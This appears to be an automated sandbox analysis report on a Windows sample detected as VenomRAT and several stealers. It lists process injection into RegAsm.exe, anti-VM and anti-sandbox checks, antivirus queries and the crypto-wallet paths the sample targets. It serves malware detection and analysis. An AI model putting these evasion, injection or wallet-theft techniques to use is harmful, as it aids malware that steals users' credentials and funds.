Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.1721135012.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Yara detected VenomRAT

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Users\user\Desktop\vfdjo.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Memory allocated: 2A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1032			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 8810			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll

Jump to dropped file

Source: C:\Users\user\Desktop\vfdjo.exe TID: 7612	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7704	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7728	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: RegAsm.exe, 00000004.00000002.4158509503.00000000055BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn2b<
Source: RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
Source: RegAsm.exe, 00000004.00000002.4158509503.00000000055BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: vfdjo.exe, 00000000.00000002.1721135012.00000000010F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 0.2.vfdjo.exe.50d0000.8.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.vfdjo.exe.50d0000.8.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.vfdjo.exe.50d0000.8.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\vfdjo.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Compiles code for process injection (via .Net compiler)

Source: C:\Users\user\Desktop\vfdjo.exe

File written: C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\vfdjo.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\vfdjo.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 700000	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 702000	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DC4008	Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD93C.tmp" "c:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP"	Jump to behavior

Source: RegAsm.exe, 00000004.00000002.4148154004.0000000003255000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.00000000031E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^q
Source: RegAsm.exe, 00000004.00000002.4148154004.0000000003255000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.00000000031E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: ProgMan
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd!SHELLDLL_DefView
Source: RegAsm.exe, 00000004.00000002.4148154004.00000000030E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^qPaste_bin@\^q
Source: RegAsm.exe, 00000004.00000002.4148154004.0000000003255000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.00000000031E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`,^q

Source: C:\Users\user\Desktop\vfdjo.exe	Queries volume information: C:\Users\user\Desktop\vfdjo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected VenomRAT

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: RegAsm.exe, 00000004.00000002.4157806549.0000000005376000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Yara detected BrowserPasswordDump

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Yara detected DcRat

Source: Yara match

File source: 00000004.00000002.4148154004.000000000304D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected StormKitty Stealer

Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
